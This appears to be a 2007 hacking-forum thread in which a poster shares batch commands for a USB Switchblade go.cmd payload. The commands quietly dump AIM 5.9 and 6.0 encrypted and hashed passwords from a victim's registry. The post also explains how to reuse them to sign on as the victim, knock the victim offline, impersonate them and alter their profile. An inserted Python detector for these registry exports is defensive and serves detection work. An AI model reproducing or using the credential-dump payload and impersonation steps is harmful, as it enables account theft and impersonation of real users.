AndyzBong Posted June 25, 2007

Unless you have read my previous post (from a while back) concerning the extraction and exploitation (via the USB Switchblade) of AIM 5.9 encrypted passwords, I suggest reading it before continuing: http://forums.hak5.org/index.php/topic,4398.0.html This should give you a basic understanding of the concept.

Anyways, for those of you who are familiar with my previous post, this is merely an update that you can add to your go.cmd file to extract AIM 6.0 encrypted passwords and exploit them to sign on as "hacked screen-names". The technique of importing the AIM registry information properly (at your computer) takes a few attempts to get it down pat, so be patient. I suggest exiting out of any AIM clients, and repeatedly checking RegEdit to see if the encrypted password has still been entered.

Finally, I must again stress that this exploit is more of a DoS attack or could possibly serve as a social engineering attack (by impersonating the "hacked" victim). Once you have the encrypted password, you cannot change it; you can only kick the screen-name off-line when the AOL System Manager informs you that "You are now signed-on in two locations. Press 1 to disconnect your other connection."

The new code to add is as follows:

regedit.exe /E Documents\logfiles\aim6pass.txt "HKEY_CURRENT_USER\Software\America Online\AIM6\Passwords"
regedit.exe /E Documents\logfiles\aim6hashpass.txt "HKEY_CURRENT_USER\Software\America Online\AIM6\HashedPasswords"

Your complete AIM 5.9 & AIM 6.0 go.cmd code should look like:

@echo [AIM 5.9 & 6.0 Encrypted Password Dump] >> Documents\logfiles\%computername%.log 2>&1
echo. >> Documents\logfiles\%computername%.log 2>&1
regedit.exe /E Documents\logfiles\aim59dump.reg "HKEY_CURRENT_USER\SOFTWARE\America Online\AOL Instant Messenger (TM)\CurrentVersion\users"
TYPE Documents\logfiles\aim59dump.reg | find "Password1" >> Documents\logfiles\%computername%.log
regedit.exe /E Documents\logfiles\aim6pass.txt "HKEY_CURRENT_USER\Software\America Online\AIM6\Passwords"
regedit.exe /E Documents\logfiles\aim6hashpass.txt "HKEY_CURRENT_USER\Software\America Online\AIM6\HashedPasswords"
echo. >> Documents\logfiles\%computername%.log 2>&1
@echo [END AIM 5.9 & 6.0 Encrypted Password Dump] >> Documents\logfiles\%computername%.log 2>&1

Like I previously stated, this is a great alternative to MessenPass (due to some Anti-Viruses being able to detect MessenPass and its inability to decrypt passwords for versions of AIM beyond 5.5). If you are having trouble, please leave a detailed description of what the problem is, and I will try my best to help.

Lastly, and the kind of interesting part. AIM 5.9 profile files are stored on the oscar.aim.com server (correct me if I am wrong) and are "roaming profiles"; similar to "roaming buddy-lists" (you can sign on from any location and still have your profile and buddy-list). AIM 6.0 however, stores your profile information locally in a file called common.cls in the directory: C:\Documents and Settings\<username>\local settings\application data\aol ocp\aim\storage\data\<screen-name>\local storage

Common.cls appears as a Visual Basic module; I could not open it with VB6, so use ol' trusty Notepad. When you sign on a "hacked" AIM 6.0 screen-name you can (remotely) change the victim's profile, save it, and it will change the data in the common.cls file (as well as be their new profile). (Search for <HTML> in common.cls to find the profile beginning). The great part is, if you have physical access to the machine (since you're using your USB Switchblade and all) you can set common.cls to "Read-Only". Enjoy!
- AndyzBong
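A defender-side check for the export commands shown in the post above, added here as an example and not part of the original thread: it scans process-creation command lines (constructed samples in the shape of a Sysmon event 1 or Windows 4688 CommandLine field) for regedit.exe /E exports of the AIM credential keys the post names. The tokenizer, the key list and the sample lines are this example's own assumptions.

```python
import re

# Registry keys the post exports with "regedit.exe /E", lower-cased because
# Windows registry paths compare case-insensitively.
AIM_CREDENTIAL_KEYS = tuple(k.lower() for k in (
    r"HKEY_CURRENT_USER\Software\America Online\AIM6\Passwords",
    r"HKEY_CURRENT_USER\Software\America Online\AIM6\HashedPasswords",
    r"HKEY_CURRENT_USER\SOFTWARE\America Online\AOL Instant Messenger (TM)\CurrentVersion\users",
))

# Minimal Windows command-line tokenizer: double-quoted strings or bare words.
_TOKEN = re.compile(r'"([^"]*)"|(\S+)')

def tokenize(command_line):
    return [quoted or bare for quoted, bare in _TOKEN.findall(command_line)]

def exported_aim_key(command_line):
    """Return the AIM credential key that a 'regedit /E <file> <key>' command
    exports (normalised to lower case), or None for any other command line."""
    toks = tokenize(command_line)
    if not toks or toks[0].rsplit("\\", 1)[-1].lower() not in ("regedit", "regedit.exe"):
        return None
    # regedit's export form is: regedit [/S] /E <outfile> <key>
    switches = [t.lower() for t in toks[1:] if t.startswith("/")]
    args = [t for t in toks[1:] if not t.startswith("/")]
    if "/e" not in switches or len(args) < 2:
        return None
    key = args[1].lower().rstrip("\\")
    for known in AIM_CREDENTIAL_KEYS:
        # Match the key itself or any subkey beneath it.
        if key == known or key.startswith(known + "\\"):
            return known
    return None

def scan(command_lines):
    """Keep only the command lines that export an AIM credential key."""
    return [(line, key) for line in command_lines if (key := exported_aim_key(line))]

# Constructed sample CommandLine values; the first two mirror the post's go.cmd,
# the last two are benign registry exports/imports that must not alert.
SAMPLE_COMMAND_LINES = [
    r'regedit.exe /E Documents\logfiles\aim6pass.txt "HKEY_CURRENT_USER\Software\America Online\AIM6\Passwords"',
    r'regedit.exe /E Documents\logfiles\aim59dump.reg "HKEY_CURRENT_USER\SOFTWARE\America Online\AOL Instant Messenger (TM)\CurrentVersion\users"',
    r'"C:\Windows\regedit.exe" /S /E C:\backup\office.reg "HKEY_CURRENT_USER\Software\Microsoft\Office"',
    r'regedit.exe /S C:\setup\defaults.reg',
]
```

Running `scan(SAMPLE_COMMAND_LINES)` returns the two AIM exports and nothing else; the same function can be fed the CommandLine field of real process-creation events.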
elmer Posted June 26, 2007

Hmm... This is very interesting. If you have time, you should write up an article for Analog5. I don't personally use AIM, so I am not afraid, but I know some people :).